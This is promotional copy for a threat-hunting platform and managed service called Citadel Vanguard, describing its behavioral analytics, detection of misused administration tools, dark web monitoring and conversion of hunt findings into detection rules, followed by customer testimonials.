57% of breaches are discovered by outsiders — not your SOC, not your SIEM, not your EDR. The attackers who evade automated detection are the ones who cause catastrophic damage. They use legitimate tools. They move slowly. They blend in. They are patient. Citadel Vanguard hunts them — proactively, continuously, relentlessly — using hypothesis-driven investigation, behavioral analytics, and AI-augmented telemetry to find what your automated defenses were designed to miss.
Your detection stack has a ceiling. It will always have a ceiling. Because the most dangerous adversaries design their operations specifically to stay below it. They use PowerShell, not malware. They use RDP, not exploits. They use your own service accounts, not their own credentials. They move at human speed — one step per day, one lateral movement per week — staying below the thresholds your detection rules were tuned to catch. These are the adversaries that cause $4.4 million breaches. And your SIEM will never alert on them.
Vanguard exists in the space above the detection ceiling — where human expertise, hypothesis-driven investigation, and AI-augmented analytics converge to find the threats that automation was never designed to catch. Every hunt begins with a question: "What would this specific adversary do in our specific environment?" Then the hunter goes looking for the answer — armed with behavioral baselines, cross-domain telemetry, threat intelligence, and ML anomaly detection that surfaces the subtle signals hidden in petabytes of normal activity.
Vanguard provides the platform, the data, and the AI — your hunters provide the hypotheses, the intuition, and the judgment.
Every hunt starts with a question — a falsifiable hypothesis about adversary behavior. "An attacker has compromised a service account and is using WMI for lateral movement." "A threat actor is staging data in a cloud storage bucket before exfiltration." "An insider is using legitimate tools to access data outside their role." Vanguard structures the entire hunt lifecycle: hypothesis generation (AI-suggested based on your industry, threat profile, and ATT&CK coverage gaps), data scoping, query execution across all telemetry sources, anomaly analysis, validation, and — critically — conversion of validated findings into automated detection rules so the same threat is caught automatically next time.
The most sophisticated adversaries never install malware — they use the tools already present on every Windows system. PowerShell for command execution. WMI for lateral movement. Certutil for file download. PsExec for remote execution. RDP for interactive access. These "living-off-the-land binaries" (LOLBins) are legitimate administration tools — and they generate zero malware signatures. Vanguard's LOTL detection engine baselines normal administrative tool usage for every user, every service account, and every system — then hunts for deviations that indicate adversary abuse: PowerShell execution by users who never use it, WMI connections at unusual hours, PsExec from workstations that should never initiate remote administration.
Effective threat hunting requires knowing who is likely to target you — and how they operate. Vanguard's adversary intelligence engine maintains continuously updated profiles of 200+ documented threat groups, mapping their preferred tactics, techniques, and procedures to the MITRE ATT&CK framework. The system prioritizes threat groups by relevance to your industry vertical, geographic presence, technology stack, and known targeting patterns — so your hunters focus on the adversaries most likely to be in your environment, not the ones making headlines in someone else's industry.
The adversaries who cause the most damage are the ones who move slowly — one lateral movement per day, one new access per week, always staying below detection thresholds. Vanguard's behavioral analytics engine builds dynamic baselines for every entity in your environment: users (login times, access patterns, data volumes), devices (process execution, network connections, service startups), and services (API call patterns, data flow volumes, authentication behavior). The engine surfaces anomalies that individually seem benign but collectively indicate compromise — a login from a new location + access to an unusual file share + a data transfer slightly above average = a pattern that deserves investigation.
Hunters can only find what they can see — and most hunting programs are limited by fragmented data access across siloed tools. Vanguard provides a unified hunt data lake that aggregates telemetry from endpoint (process, file, registry, network), network (flow, PCAP, DNS), cloud (audit logs, IAM, storage), identity (AD, Entra, Okta), email (gateway, inbox), and SaaS (O365, Salesforce, Slack) into a single, high-performance query interface. Hunters can search across all domains simultaneously using natural language ("Show me all PowerShell execution by service accounts in the last 30 days") or structured queries (KQL, SPL, Sigma) — eliminating the tool-switching that consumes 40% of a hunter's time in fragmented environments.
A hunt without a detection flywheel is a missed opportunity. Every time a hunter finds a threat that automated detection missed, the natural question is: "Why didn't our SIEM catch this?" Vanguard's flywheel engine answers that question and solves it. When a hunt validates a finding, the system automatically generates a detection rule in the appropriate format (Sigma, YARA, KQL, SPL), tests the rule against historical data to measure false positive rate, and deploys the validated rule to Citadel's SIEM. Over time, the flywheel continuously expands automated coverage based on real-world hunt findings — so each hunt makes the next one less necessary for that specific technique.
The most valuable threat intelligence often comes from outside your perimeter — from the criminal underground where stolen credentials are sold, where initial access brokers auction network footholds, and where threat actors discuss targeting your industry. Vanguard monitors dark web forums, paste sites, criminal marketplaces, Telegram channels, and underground access broker sites for your organization's credentials, domain mentions, data samples, and infrastructure references. When your data appears in the underground, Vanguard generates an immediate hunt — searching your environment for evidence that the compromised credentials have been used or that the advertised access point has been exploited.
Threat hunting requires a rare combination of adversary mindset, deep technical expertise, and investigative intuition — talent that most organizations cannot recruit or retain. Vanguard's managed hunt service provides dedicated Citadel hunters who conduct continuous hunt campaigns against your environment using your telemetry, your threat profile, and your risk priorities. Each hunter averages 12 years of adversary-focused experience, including backgrounds in national intelligence, law enforcement cyber units, and enterprise red teams. Findings are delivered with full context, MITRE ATT&CK mapping, and detection rules — and integrated directly into your Citadel SIEM and SOAR workflows.
The DNS tunneling implant had been in our environment for eighteen months. Eighteen months. Our SIEM processed the DNS traffic every day and never alerted — because the traffic volume was designed to look like NTP updates. Our EDR saw a legitimate Windows service making DNS queries and flagged nothing. Our network monitoring saw encrypted traffic to a known DNS resolver and ignored it. A Vanguard hunter noticed that the query frequency deviated from actual NTP patterns by 0.3 standard deviations. That deviation — invisible to every automated system we own — was the thread that unraveled an 18-month nation-state operation in our SCADA network.
The detection flywheel is the most underappreciated feature. Every hunt that finds something produces a detection rule. Every detection rule means the automated layer catches that behavior next time. After six months of Vanguard hunts, our automated detection coverage expanded by 34 new rules — each one based on a real threat found in our real environment by a real hunter. Not theoretical rules from a vendor template. Rules born from actual adversary behavior. That is how you turn proactive hunting into permanent defensive improvement.
We discovered our departing VP was stealing $2.3 billion in client portfolio data — and our DLP never saw it. The data was leaving via browser upload to a personal OneDrive account, in increments small enough to stay below every threshold we had set. Without the behavioral baseline that showed a 340% increase in data access since the notice period, and the cross-domain telemetry that tracked the browser uploads our DLP didn't monitor, that data would have walked out the door. Vanguard did not just find a threat. It prevented a business catastrophe.
Deploy Vanguard — as a platform for your hunt team, or as a managed service with Citadel's elite hunters operating in your environment.